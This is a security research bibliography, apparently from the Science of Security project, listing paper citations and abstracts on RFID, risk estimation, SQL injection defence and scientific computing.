  • Measel, Ryan; Lester, Christopher S.; Xu, Yifei; Primerano, Richard; Kam, Moshe, "Detection Performance Of Spread Spectrum Signatures For Passive, Chipless RFID," RFID (IEEE RFID), 2014 IEEE International Conference on , vol., no., pp.55,59, 8-10 April 2014. (ID#:14-1767) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810712&isnumber=6810700 Time-Domain Reflectometry (TDR) RFID tags are passive, chipless tags that use discontinuities along a transmission line to create reflections. The discontinuities may be designed to produce a bipodal signal encoded with the unique identifier of the tag. When multiple tags are co-located and interrogated simultaneously, multiple access interference degrades the ability of the reader to detect the tags accurately. Reader detection can be improved by using spread spectrum signatures as the unique identifiers to limit interference. This work evaluates the ability of Gold codes and Kasami-Large codes to improve detection performance of a passive, chipless TDR RFID system. Simulations were conducted for varying numbers of simultaneously interrogated tags using synthetic tag responses constructed from the measured waveform of a prototype TDR tag. Results indicate that the Gold Code signature set outperforms the Kasami-Large Code signature set and a random, naive set for simultaneous interrogation of less than 15 tags. For larger numbers of simultaneous tags, a random set performs nearly as well as the Kasami-Large Code set and provides more useful signatures. Keywords: Correlation; Gold; Impedance; Interference; Passive RFID tags; Prototypes
  • Baloch, Fariha; Pendse, Ravi, "A New Anti-Collision Protocol For RFID Networks," Wireless Telecommunications Symposium (WTS), 2014 , vol., no., pp.1,5, 9-11 April 2014. (ID#:14-1768) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834996&isnumber=6834983 The speed at which RFID tags are read is critical to many RFID applications. Tag collisions can increase the time to gather information from tags in RFID networks. These collisions are unavoidable; however the time spent on them can be reduced using an intelligent medium access protocol. In this paper, the authors present a unique anti-collision protocol that scans for collided and empty slots in an RFID network before querying for tag IDs. The new proposed protocol uses a modified version of the bit scan technique to scan for unsuccessful slots. By identifying these slots using a low overhead scan process, the penalty of collisions and empty slots during the query process is reduced and thus a better end-to-end tag reading time is observed. Keywords: EPC C1G2; Medium Access; Performance; RFID; Scan
  • Ben Niu, Xiaoyan Zhu, Haotian Chi, Hui Li, "Privacy and Authentication Protocol for Mobile RFID Systems," Wireless Personal Communications: An International Journal, Volume 77 Issue 3, August 2014, (Pages 1713-1731). (ID#:14-1769) Available at: http://dx.doi.org/10.1016/j.dss.2013.10.003 Security and privacy issues in RFID technology gain tremendous popularity recently. However, existing work on RFID authentication problems always make assumptions such as (1) hash function can be fully employed in designing RFID protocols; (2) channels between readers and server are always secure. The first assumption is not suitable for EPC Class-1 Gen-2 tags, which has been challenged in many research work, while the second one cannot be directly adopted in mobile RFID applications where wireless channels between readers and server are always insecure. To solve these problems, in this paper, we propose a novel ultralightweight and privacy-preserving authentication protocol for mobile RFID systems. We only use bitwise XOR, and several special constructed pseudo-random number generators to achieve our aims in the insecure mobile RFID environment. We use GNY logic to prove the security correctness of our proposed protocol. The security and privacy analysis show that our protocol can provide several privacy properties and avoid suffering from a number of attacks, including tag anonymity, tag location privacy, reader privacy, forward secrecy, and mutual authentication, replay attack, desynchronization attack etc. We implement our protocol and compare several parameters with existing work, the evaluation results indicate us that our protocol significantly improves the system performance. Keywords: Authentication, Mobile RFID systems, Privacy-preserving, Ultralightweight
  • Farzana Rahman, Sheikh Iqbal Ahamed, "Efficient Detection Of Counterfeit Products In Large-Scale RFID Systems Using Batch Authentication Protocols," Personal and Ubiquitous Computing, Volume 18 Issue 1, January 2014, (Pages 177-188). (ID#:14-1770) Available at:http://dl.acm.org/citation.cfm?id=2581638.2581671&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1007/s00779-012-0629-8 RFID technology facilitates processing of product information, making it a promising technology for anti-counterfeiting. However, in large-scale RFID applications, such as supply chain, retail industry, pharmaceutical industry, total tag estimation and tag authentication are two major research issues. Though there are per-tag authentication protocols and probabilistic approaches for total tag estimation in RFID systems, the RFID authentication protocols are mainly per-tag-based where the reader authenticates one tag at each time. For a batch of tags, current RFID systems have to identify them and then authenticate each tag sequentially, one at a time. This increases the protocol execution time due to the large volume of authentication data. In this paper, we propose to detect counterfeit tags in large-scale system using efficient batch authentication protocol. We propose FSA-based protocol, FTest, to meet the requirements of prompt and reliable batch authentication in large-scale RFID applications. FTest can determine the validity of a batch of tags with minimal execution time which is a major goal of large-scale RFID systems. FTest can reduce protocol execution time by ensuring that the percentage of potential counterfeit products is under the user-defined threshold. The experimental result demonstrates that FTest performs significantly better than the existing counterfeit detection approaches, for example, existing authentication techniques. Keywords: Anti-counterfeiting, Batch authentication, RFID, Security, Supply chain, Tree-based protocols
  • Shuai-Min Chen, Mu-En Wu, Hung-Min Sun, King-Hang Wang, "CRFID: An RFID System With A Cloud Database As A Back-End Server," Future Generation Computer Systems, Volume 30, January, 2014, (Pages 155-161). (ID#:14-1771) Available at: http://dx.doi.org/10.1016/j.future.2013.05.004 Radio-frequency identification (RFID) systems can benefit from cloud databases since information on thousands of tags is queried at the same time. If all RFID readers in a system query a cloud database, data consistency can easily be maintained by cloud computing. Privacy-preserving authentication (PPA) has been proposed to protect RFID security. The time complexity for searching a cloud database in an RFID system is O(N), which is obviously inefficient. Fortunately, PPA uses tree structures to manage tags, which can reduce the complexity from a linear search to a logarithmic search. Hence, tree-based PPA provides RFID scalability. However, in tree-based mechanisms, compromise of a tag may cause other tags in the system to be vulnerable to tracking attacks. Here we propose a secure and efficient privacy-preserving RFID authentication protocol that uses a cloud database as an RFID server. The proposed protocol not only withstands desynchronizing and tracking attacks, but also provides scalability with O(logN) search complexity. Keywords: Cloud computing, Cryptography, Desynchronizing attack, Privacy, RFID, Remote accessibility, Security, Tracking attack

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Risk Estimations

Risk Estimations


Cybersecurity is often a balancing act between risk and cost. Every security solution adds a cost in terms of efficiency or effectiveness, if not of money. Identifying ways to make risk assessment consistent and accurate are the goals of the seven articles cited here. The first paper was presented at HOT SoS 2014, the Symposium and Bootcamp on the Science of Security (HotSoS), a research event centered on the Science of Security held April 8-9, 2014 in Raleigh, North Carolina.

  • Qian Liu, Juhee Bae, Benjamin Watson, Anne McLaughhlin, William Enck. "Modeling and Sensing Risky User Behavior on Mobile Devices" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in Journals of the ACM, 2014) (ID#:14-1416) Temporarily available at: http://www.hot-sos.org/2014/proceedings/papers.pdf As mobile technology begins to dominate computing, understanding how their use impacts security becomes increasingly important. Fortunately, this challenge is also an opportunity: the rich set of sensors with which most mobile devices are equipped provide a rich contextual dataset, one that should enable mobile user behavior to be modeled well enough to predict when users are likely to act insecurely, and provide cognitively grounded explanations of those behaviors. We will evaluate this hypothesis with a series of experiments designed first to confirm that mobile sensor data can reliably predict user stress, and that users experiencing such stress are more likely to act insecurely. Keywords: Security, user behavior, mobile, risk estimation
  • Haisjackl, C.; Felderer, M.; Breu, R., "RisCal -- A Risk Estimation Tool for Software Engineering Purposes," Software Engineering and Advanced Applications (SEAA), 2013 39th EUROMICRO Conference on , vol., no., pp.292,299, 4-6 Sept. 2013. (ID#:14-1417) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6619524&isnumber=6619471 Decision making in software engineering requires the consideration of risk information. The reliability of risk information is strongly influenced by the underlying risk estimation process which consists of the steps risk identification, risk analysis and risk prioritization. In this paper we present a novel risk estimation tool for software engineering pruposes called RisCal. RisCal is based on a generic risk model and supports the integration of manually and automatically determined metrics into the risk estimation. This makes the tool applicable for arbitrary software engineering activities like risk-based testing or release planning. We show how RisCal supports risk identification, analysis and prioritizations, provide an estimation example, and discuss its application to risk-based testing and release planning. Keywords: decision making; program testing; risk analysis; software metrics; RisCal; automatically determined metrics; decision making; generic risk model; manually determined metrics; release planning; risk analysis; risk estimation process; risk estimation tool; risk identification; risk information; risk prioritization; risk-based testing; software engineering activities; software engineering pruposes; Estimation; Measurement; Planning; Risk management; Software engineering; Testing; Release Planning; Risk Estimation; Risk-based Testing; Software Risk Management; Test Management
  • Ramler, R.; Felderer, M., "Experiences from an Initial Study on Risk Probability Estimation Based on Expert Opinion," Software Measurement and the 2013 Eighth International Conference on Software Process and Product Measurement (IWSM-MENSURA), 2013 Joint Conference of the 23rd International Workshop on , vol., no., pp.93,97, 23-26 Oct. 2013. (ID#:14-1418) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6693227&isnumber=6693201 Determining the factor probability in risk estimation requires detailed knowledge about the software product and the development process. Basing estimates on expert opinion may be a viable approach if no other data is available. Objective: In this paper we analyze initial results from estimating the risk probability based on expert opinion to answer the questions (1) Are expert opinions consistent? (2) Do expert opinions reflect the actual situation? (3) How can the results be improved? Approach: An industry project serves as case for our study. In this project six members provided initial risk estimates for the components of a software system. The resulting estimates are compared to each other to reveal the agreement between experts and they are compared to the actual risk probabilities derived in an ex-post analysis from the released version. Results: We found a moderate agreement between the rations of the individual experts. We found a significant accuracy when compared to the risk probabilities computed from the actual defects. We identified a number of lessons learned useful for improving the simple initial estimation approach applied in the studied project. Conclusions: Risk estimates have successfully been derived from subjective expert opinions. However, additional measures should be applied to triangulate and improve expert estimates. keywords: probability; risk analysis; software product lines; expert opinion; factor probability; product development process; risk probability estimation; software product; software system; Business; Estimation; Interviews; Software measurement; Software quality; Testing; expert opinion elicitation; risk estimation; risk probability; software risk measurement
  • Krishnan, S.R.; Seelamantula, C.S.; Chakravarti, P., "Spatially Adaptive Kernel Regression Using Risk Estimation," Signal Processing Letters, IEEE , vol.21, no.4, pp.445,448, April 2014. (ID#:14-1419) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6734684&isnumber=6732989 An important question in kernel regression is one of estimating the order and bandwidth parameters from available noisy data. We propose to solve the problem within a risk estimation framework. Considering an independent and identically distributed (i.i.d.) Gaussian observations model, we use Stein's unbiased risk estimator (SURE) to estimate a weighted mean-square error (MSE) risk, and optimize it with respect to the order and bandwidth parameters. The two parameters are thus spatially adapted in such a manner that noise smoothing and fine structure preservation are simultaneously achieved. On the application side, we consider the problem of image restoration from uniform/non-uniform data, and show that the SURE approach to spatially adaptive kernel regression results in better quality estimation compared with its spatially non-adaptive counterparts. The denoising results obtained are comparable to those obtained using other state-of-the-art techniques, and in some scenarios, superior. Keywords: Gaussian processes; image denoising; image restoration; mean square error methods; regression analysis; Gaussian observations model; SURE; Stein unbiased risk estimator; fine structure preservation; image denoising; image restoration; noise smoothing; quality estimation; risk estimation; spatially adaptive kernel regression; weighted mean-square error; Bandwidth; Cost function; Estimation; Kernel; Noise measurement; Signal processing algorithms; Smoothing methods; Denoising; Stein's unbiased risk estimator (SURE);nonparametric regression; spatially adaptive kernel regression
  • Babuscia, A., Kar-Ming Cheung, "Statistical Risk Estimation for Communication System Design," Systems Journal, IEEE , vol.7, no.1, pp.125,136, March 2013. (ID#:14-1420) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6264116&isnumber=6466438 Spacecraft is complex systems that involve different subsystems and multiple relationships among them. For these reasons, the design of a spacecraft is an evolutionary process that starts from requirements and evolves over time across different design phases. During this process, a lot of changes can happen. They can affect mass and power at component, subsystem, and system levels. Each spacecraft has to respect the overall constraints in terms of mass and power: for this reason, it is important to be sure that the design does not exceed these limitations. Current practice in the system model primarily deals with this problem by allocating margins on individual components and on individual subsystems. However, a statistical characterization of the fluctuations in mass and power of the overall system (i.e., the spacecraft) is missing. This lack of an adequate statistical characterization would result in a risky spacecraft design that might not fit the mission constraints and requirements, or in a conservative design that might not fully utilize the available resources. Due to the complexity of the problem and due to the different expertise and knowledge required to develop a complete risk model for a spacecraft design, this research is focused on risk estimation for a specific spacecraft subsystem, the communication subsystem. The current research aims to be a "proof of concept" of a risk-based design optimization approach, which can then be further expanded to the design of other subsystems as well as to the whole spacecraft. The objective of this paper is to develop a mathematical approach to quantify the likelihood that the major design drivers of mass and power of a space communication system would meet the spacecraft and mission requirements and constraints through the mission design lifecycle. Using this approach the communication system designers will be able to evaluate and compare different communication architectures in a risk tradeoff perspective. The results described in the presentation include a baseline communication system design tool, and a statistical characterization of the design risks through a combination of historical mission data and expert opinion contributions. An application example of the communication system of a university spacecraft is presented. Keywords: mathematical analysis; optimization; risk analysis; space communication links; space vehicles; statistical analysis; communication subsystem; communication system design; communication system designers; design phases; evolutionary process; historical mission data; mathematical approach; risk model; risk tradeoff prospective; risk-based design optimization approach; space communication system; spacecraft design; spacecraft subsystem; statistical characterization; statistical risk estimation; system model; university spacecraft; Antennas; Communication systems; Computational modeling; Data models; Databases; Estimation; Space vehicles; Biases; communication system; density estimation; design risk; expert elicitation; heuristics; risk analysis
  • Moussa Ouedraogo, Manel Khodja, Djamel Khadraoui, "Towards a Risk Based Assessment of QoS Degradation for Critical Infrastructure" Proceedings of the 2013 International Conference on Availability, Reliability and Security, September 2013. (Pages 538-545) (ID#:14-1421) Available at: http://dl.acm.org/citation.cfm?id=2545118.2545245&coll=DL&dl=GUIDE&CFID=449793911&CFTOKEN=46643839 or http://dx.doi.org/10.1109/ARES.2013.71 In this paper, we first present an attack-graph based estimation of security risk and its aggregation from lower level components to an entire service. We then presents an initiative towards appreciating how the quality of service (QoS) parameters of a service may be affected as a result of fluctuations in the cyber security risk level. Because the service provided by critical infrastructure is often vital, providing an approach that enables the operator to foresee any QoS degradation as a result of a security event is paramount. We provide an illustration of the risk estimation approach along with a description of an initial prototype developed using a multi-agent platform. Keywords: Critical infrastructure, Vulnerabilities, Risk, Quality of Service
  • Severien Nkurunziza, Fuqi Chen, "On extension of some identities for the bias and risk functions in elliptically contoured distributions" Journal of Multivariate Analysis, Volume 122, November, 2013 (Pages 190-201). (ID#:14-1422) Available at: http://dl.acm.org/citation.cfm?id=2532872.2532997&coll=DL&dl=GUIDE&CFID=449793911&CFTOKEN=46643839 or http://dx.doi.org/10.1016/j.jmva.2013.07.005 In this paper, we are interested in an estimation problem concerning the mean parameter of a random matrix whose distribution is elliptically contoured. We derive two general formulas for the bias and risk functions of a class of multidimensional shrinkage-type estimators. As a by product, we generalize some recent identities established in Gaussian sample cases for which the shrinking random part is a single Kronecker-product. Here, the variance-covariance matrix of the shrinking random part is the sum of two Kronecker-products. Keywords: 62F25, 62H12, Bias function, Elliptically contoured distribution, Kronecker-product, Matrix estimation, Risk function, Stein rules


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.





SQL Injections

SQL Injections


SQL injection is used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution to dump the database contents to the attacker. One of the most common hacker techniques, SQL injection is used to exploit a security vulnerability in an application's software. It is mostly used against websites but can be used to attack any type of SQL database. Because of its prevalence and ease of use from the hacker perspective, it is an important area for research. The articles cited here focus on prevention, detection, and testing.

  • Srivastava, Mahima, "Algorithm to Prevent Back End Database Against SQL Injection Attacks," Computing for Sustainable Global Development (INDIA Com), 2014 International Conference on, vol., no., p.754, 757, 5-7 March 2014. (ID#:14-1797) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828063&isnumber=6827395 SQL injection attack (SQLIA) is a technique through which attackers gain access over back-end databases by inserting the malicious codes through front-end. In recent times SQL injection attacks (SQLIAs) have emerged as a major threat to database security. Flaws in designing, improper coding practices, configuration errors, improper validation of user input etc. makes the web application vulnerable and allows the malicious user to obtain unrestricted access to confidential information. Researchers have proposed so many solutions but still SQLIAs exist. In this paper we will discuss several types of SQLIAs, existing techniques and their drawbacks. Finally I have proposed a solution using the ASCII values. I have implemented it using C# and SQL server 2005, although this algorithm can be implemented in any language and for any database platform with minimal modifications. Keywords: Arrays; Authentication; Databases; Encoding; Internet; Servers; ASCII values; SQL injections; SQL query; cyber crime; run time monitoring
  • Khanuja, H.; Suratkar, S.S., ""Role of Metadata In Forensic Analysis Of Database Attacks"," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.457,462, 21-22 Feb. 2014. (ID#:14-1798) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779367&isnumber=6779283 With the spectacular increase in online activities like e-transactions, security and privacy issues are at the peak with respect to their significance. Large numbers of database security breaches are occurring at a very high rate on daily basis. So, there is a crucial need in the field of database forensics to make several redundant copies of sensitive data found in database server artifacts, audit logs, cache, table storage etc. for analysis purposes. Large volume of metadata is available in database infrastructure for investigation purposes but most of the effort lies in the retrieval and analysis of that information from computing systems. Thus, in this paper we mainly focus on the significance of metadata in database forensics. We proposed a system here to perform forensics analysis of database by generating its metadata file independent of the DBMS system used. We also aim to generate the digital evidence against criminals for presenting it in the court of law in the form of who, when, why, what, how and where did the fraudulent transaction occur. Thus, we are presenting a system to detect major database attacks as well as anti-forensics attacks by developing an open source database forensics tool. Eventually, we are pointing out the challenges in the field of forensics and how these challenges can be used as opportunities to stimulate the areas of database forensics. Keywords: data privacy; digital forensics; law; meta data; antiforensics attacks; audit logs; cache; court of law; database attacks; database security breaches; database server artifacts; digital evidence; e-transactions; forensic analysis; fraudulent transaction information analysis; information retrieval; metadata; online activities; open source database forensics tool; privacy issue; security issue ;table storage; Conferences; Handheld computers; Database forensics; SQL injection; anti-forensics attacks; digital notarization; linked hash technique; metadata; reconnaissance attack; trail obfuscation
  • Antunes, N.; Vieira, M., "Penetration Testing for Web Services," Computer , vol.47, no.2, pp.30,36, Feb. 2014. (ID#:14-1799) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6681866&isnumber=6756723 Web services are often deployed with critical software security faults that open them to malicious attack. Penetration testing using commercially available automated tools can help avoid such faults, but new analysis of several popular testing tools reveals significant failings in their performance. The Web extra at http://youtu.be/COgKs9e679o is an audio interview in which authors Nuno Antunes and Marco Vieira describe how their analysis of popular testing tools revealed significant performance failures and provided important insights for future improvement. Keywords: Web services; program testing; safety-critical software; security of data; Web services; commercially available automated tools; critical software security faults; malicious attack; penetration testing; Computer security; Computer viruses; Runtime; Simple object access protocol; Software testing; Web and internet services; SQL injection; Web security scanners; Web services; code vulnerabilities; command injection; penetration testing; vulnerability detection
  • Bozic, Josip; Wotawa, Franz, "Security Testing Based on Attack Patterns," Software Testing, Verification and Validation Workshops (ICSTW), 2014 IEEE Seventh International Conference on , vol., no., pp.4,11, March 31 2014-April 4 2014. (ID#:14-1800) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825631&isnumber=6825623 Testing for security related issues is an important task of growing interest due to the vast amount of applications and services available over the internet. In practice testing for security often is performed manually with the consequences of higher costs, and no integration of security testing with today's agile software development processes. In order to bring security testing into practice, many different approaches have been suggested including fuzz testing and model-based testing approaches. Most of these approaches rely on models of the system or the application domain. In this paper we suggest to formalize attack patterns from which test cases can be generated and even executed automatically. Hence, testing for known attacks can be easily integrated into software development processes where automated testing, e.g., for daily builds, is a requirement. The approach makes use of UML state charts. Besides discussing the approach, we illustrate the approach using a case study. Keywords: Adaptation models; Databases; HTML; Security; Software; Testing; Unified modeling language; Attack pattern; SQL injection; UML state machine; cross-site scripting; model-based testing; security testing
  • Fonseca, Jose; Seixas, Nuno; Vieira, Marco; Madeira, Henrique, "Analysis of Field Data on Web Security Vulnerabilities," Dependable and Secure Computing, IEEE Transactions on , vol.11, no.2, pp.89,100, March-April 2014. (ID#:14-1801) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6589556&isnumber=6785951 Most web applications have critical bugs (faults) affecting their security, which makes them vulnerable to attacks by hackers and organized crime. To prevent these security problems from occurring it is of utmost importance to understand the typical software faults. This paper contributes to this body of knowledge by presenting a field study on two of the most widely spread and critical web application vulnerabilities: SQL Injection and XSS. It analyzes the source code of security patches of widely used web applications written in weak and strong typed languages. Results show that only a small subset of software fault types, affecting a restricted collection of statements, is related to security. To understand how these vulnerabilities are really exploited by hackers, this paper also presents an analysis of the source code of the scripts used to attack them. The outcomes of this study can be used to train software developers and code inspectors in the detection of such faults and are also the foundation for the research of realistic vulnerability and attack injectors that can be used to assess security mechanisms, such as intrusion detection systems, vulnerability scanners, and static code analyzers. Keywords: Awards activities; Blogs; Internet; Java; Security; Software; Internet applications; Security; languages; review and evaluation
  • Hamdi, Mohammed; Safran, Mejdl; Hou, Wen-Chi, "A Security Novel for a Networked Database," Computational Science and Computational Intelligence (CSCI), 2014 International Conference on , vol.1, no., pp.279,284, 10-13 March 2014. (ID#:14-1802) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822122&isnumber=6822065 The security of databases is an important characteristic for database systems. It is intended to protect data from unauthorized access, damage or loss. With the advance of the methods of penetration and piracy, and with the increased reliance on databases that are connected with the Internet, the protection of databases has become one of the challenges faced by various emerging institutions, especially with the increasing of electronic crimes and thefts. In light of this, the focus is on analyzing and reviewing the cryptosystem architecture for networked databases. In this paper, we will discuss the process of encryption and decryption at the application and storage levels. Moreover, strategies of encryption inside the database by using the property of Transparent Data Encryption will be addressed. These methods will give a clear analysis of how data stored in databases can be protected and secured over the network. Additionally, these methods will help to overcome problems that are usually faced by administrative beginners, who work in the enterprises and manage their databases. Finally, we will discuss SQL injection, as a database attack and present the techniques of defense that prevent the adversaries from attacking the database. Keywords: Ciphers; Databases; Encryption; Public key; Servers; Cryptography; Database; SQL; Security
  • Alqahtani, Saeed M.; Balushi, Maqbool Al; John, Robert, "An Intelligent Intrusion Prevention System for Cloud Computing (SIPSCC)," Computational Science and Computational Intelligence (CSCI), 2014 International Conference on , vol.2, no., pp.152,158, 10-13 March 2014. (ID#:14-1803) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822321&isnumber=6822285 Cloud computing is a fast growing IT model for the exchange and delivery of different services through the Internet. However there is a plethora of security concerns in cloud computing which still need to be tackled (e.g. confidentiality, auditability and Privileged User Access). To detect and prevent such issues, the Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) are effective mechanism against attacks such as SQL Injection. This study proposes a new service of IPS that prevents SQL injections when it comes over cloud computing website (CCW) using signature-based devices approach. A model has been implemented on three virtual machines. Through this implementation, a service-based intrusion prevention system in cloud computing (SIPSCC) is proposed, investigated and evaluated from three perspectives the vulnerability detection, average time, and false positives. Keywords: Cloud computing; Databases; Educational institutions; Intrusion detection; Servers; SIPSCC; CCW; IDS; IPS; Open Source Hostbased Intrusion Detection System (OSSEC)
  • Al-Sakib Khan Pathan, Diallo Abdoulaye Kindy, "Lethality of SQL Injection Against Current And Future Internet Technologies," International Journal of Computational Science and Engineering archive Volume 9 Issue 4, April 2014, (Pages 386-394). (ID#:14-1804) Available at: http://dl.acm.org/citation.cfm?id=2630009.2630019&coll=DL&dl=GUIDE&CFID=485004180&CFTOKEN=38695484 or http://dx.doi.org/10.1504/IJCSE.2014.060720 SQL injection attack is often used as the underlying technology for hacking, which has made significant number of news headlines in recent years. A vast majority of the readers do not have a clear idea how SQL injection attack is used for hacking. In this article, we analyze this technology from necessary angles and discuss how this could be a significant potential threat for the future web and internet technologies. Keyword: SQL injection
  • Michael Marcozzi, Wim Vanhoof, Jean-Luc Hainaut, "Towards Testing Of Full-Scale SQL Applications Using Relational Symbolic Execution," CSTVA 2014 Proceedings of the 6th International Workshop on Constraints in Software Testing, Verification, and Analysis, May 2014, (Pages 12-17). (ID#:14-1805) Available at: http://dl.acm.org/citation.cfm?id=2593735.2593738&coll=DL&dl=GUIDE&CFID=485004180&CFTOKEN=38695484 or http://dx.doi.org/10.1145/2593735.2593738 Constraint-based testing is an automatic test case generation approach where the tested application is transformed into constraints whose solutions are adequate test data. In previous work, we have shown that this technique is particularly well-suited for testing SQL applications, as the semantics of SQL can be naturally transformed into standard SMT constraints, using so-called relational symbolic execution. In particular, we have demonstrated such testing to be possible in practice with current solver techniques for small-scale applications. In this work, we identify the main challenges and provide research directions towards constraint-based testing of full-scale SQL applications. We investigate the additional research work needed to integrate relational and dynamic symbolic execution, handle properly dynamic SQL, generate tractable SMT constraints for most SQL applications, detect SQL runtime errors and deal with non-deterministic SQL. Keywords: Databases, Fault localization, Quantifiers, SMT solvers, SQL, Symbolic execution, Test data generation
  • Anton V. Uzunov, Eduardo B. Fernandez, "An Extensible Pattern-Based Library And Taxonomy Of Security Threats For Distributed Systems," Computer Standards & Interfaces, Volume 36 Issue 4, June, 2014, ( Pages 734-747). (ID#:14-1806) Available at: http://dl.acm.org/citation.cfm?id=2588915.2589309&coll=DL&dl=GUIDE&CFID=485004180&CFTOKEN=38695484 or http://dx.doi.org/10.1016/j.csi.2013.12.008 Security is one of the most essential quality attributes of distributed systems, which often operate over untrusted networks such as the Internet. To incorporate security features during the development of a distributed system requires a sound analysis of potential attacks or threats in various contexts, a process that is often termed ''threat modeling''. To reduce the level of security expertise required, threat modeling can be supported by threat libraries (structured or unstructured lists of threats), which have been found particularly effective in industry scenarios; or attack taxonomies, which offer a classification scheme to help developers find relevant attacks more easily. In this paper we combine the values of threat libraries and taxonomies, and propose an extensible, two-level ''pattern-based taxonomy'' for (general) distributed systems. The taxonomy is based on the novel concept of a threat pattern, which can be customized and instantiated in different architectural contexts to define specific threats to a system. This allows developers to quickly consider a range of relevant threats in various architectural contexts as befits a threat library, increasing the efficacy of, and reducing the expertise required for, threat modeling. The taxonomy aims to classify a wide variety of more abstract, system- and technology-independent threats, which keeps the number of threats requiring consideration manageable, increases the taxonomy's applicability, and makes it both more practical and more useful for security novices and experts alike. After describing the taxonomy which applies to distributed systems generally, we propose a simple and effective method to construct pattern-based threat taxonomies for more specific system types and/or technology contexts by specializing one or more threat patterns. This allows for the creation of a single application-specific taxonomy. We demonstrate our approach to specialization by constructing a threat taxonomy for peer-to-peer systems. Keywords: Distributed systems security attacks, Pattern-based security threat taxonomy, Peer-to-peer system-specific threats, Threat modeling, Threat patterns

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Scientific Computing

Scientific Computing


Scientific computing is concerned with constructing mathematical models and quantitative analysis techniques and using computers to analyze and solve scientific problems. As a practical matter, scientific computing is the use of computer simulation and other forms of computation from numerical analysis and theoretical computer science to solve specific problems such as cybersecurity. The articles presented here cover a range of approaches and applications, as well as theories.

  • Kumar, A.; Grupcev, V.; Yuan, Y.; Huang, J.; Tu, Y.; Shen, G., "Computing Spatial Distance Histograms for Large Scientific Datasets On-the-Fly," Knowledge and Data Engineering, IEEE Transactions on, vol. PP, no.99, pp.1,1, January 2014. (ID#:14-1772) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6702476&isnumber=4358933 This paper focuses on an important query in scientific simulation data analysis: the Spatial Distance Histogram (SDH). The computation time of an SDH query using brute force method is quadratic. Often, such queries are executed continuously over certain time periods, increasing the computation time. We propose highly efficient approximate algorithm to compute SDH over consecutive time periods with provable error bounds. The key idea of our algorithm is to derive statistical distribution of distances from the spatial and temporal characteristics of particles. Upon organizing the data into a Quad-tree based structure, the spatiotemporal characteristics of particles in each node of the tree are acquired to determine the particles' spatial distribution as well as their temporal locality in consecutive time periods. We report our efforts in implementing and optimizing the above algorithm in Graphics Processing Units (GPUs) as means to further improve the efficiency. The accuracy and efficiency of the proposed algorithm is backed by mathematical analysis and results of extensive experiments using data generated from real simulation studies. Keywords: (not provided)
  • Jacob, F.; Wynne, A.; Yan Liu; Gray, J., "Domain-Specific Languages for Developing and Deploying Signature Discovery Workflows," Computing in Science & Engineering , vol.16, no.1, pp.52,64, Jan.-Feb. 2014. (ID#:14-1773) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6654153&isnumber=6756717 Domain-agnostic signature discovery supports scientific investigation across domains through algorithm reuse. A new software tool defines two simple domain-specific languages that automate processes that support the reuse of existing algorithms in different workflow scenarios. The tool is demonstrated with a signature discovery workflow composed of services that wrap original scripts running high-performance computing tasks. Keywords: parallel processing; software reusability; software tools; specification languages; workflow management software; algorithm reuse; domain-agnostic signature discovery; domain-specific languages; high-performance computing tasks; scientific investigation; scripts; signature discovery workflow; software tool; workflow scenarios; Clustering algorithms; DSL; Domain specific languages; Scientific computing; Software algorithms; Web services; XML; DSL; Taverna; domain-specific languages; scientific computing; signature discovery; workflow
  • Humphrey, Alan; Meng, Qingyu; Berzins, Martin; de Oliveira, Diego Caminha B.; Rakamaric, Zvonimir; Gopalakrishnan, Ganesh, "Systematic Debugging Methods for Large-Scale HPC Computational Frameworks," Computing in Science & Engineering , vol.16, no.3, pp.48,56, May-June 2014. (ID#:14-1774) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6729885&isnumber=6834682 Parallel computational frameworks for high-performance computing are central to the advancement of simulation-based studies in science and engineering. Unfortunately, finding and fixing bugs in these frameworks can be extremely time consuming. Left unchecked, these bugs can drastically diminish the amount of new science that can be performed. This article presents a systematic study of the Uintah Computational Framework and approaches to debug it more incisively. A key insight is to leverage the modular structure of Uintah, which lends itself to systematic debugging. In particular, the authors have developed a new approach based on coalesced stack trace graphs (CSTG) that summarize the system behavior in terms of key control flows manifested through function invocation chains. They illustrate several scenarios for how CSTGs could help efficiently localize bugs, and present a case study of how they found and fixed a real Uintah bug using CSTGs. Keywords: Computational modeling; Computer bugs; Debugging; Runtime; Scientific computing; Software development; Systematics; computational modeling and frameworks; debugging aids; parallel programming; reliability; scientific computing
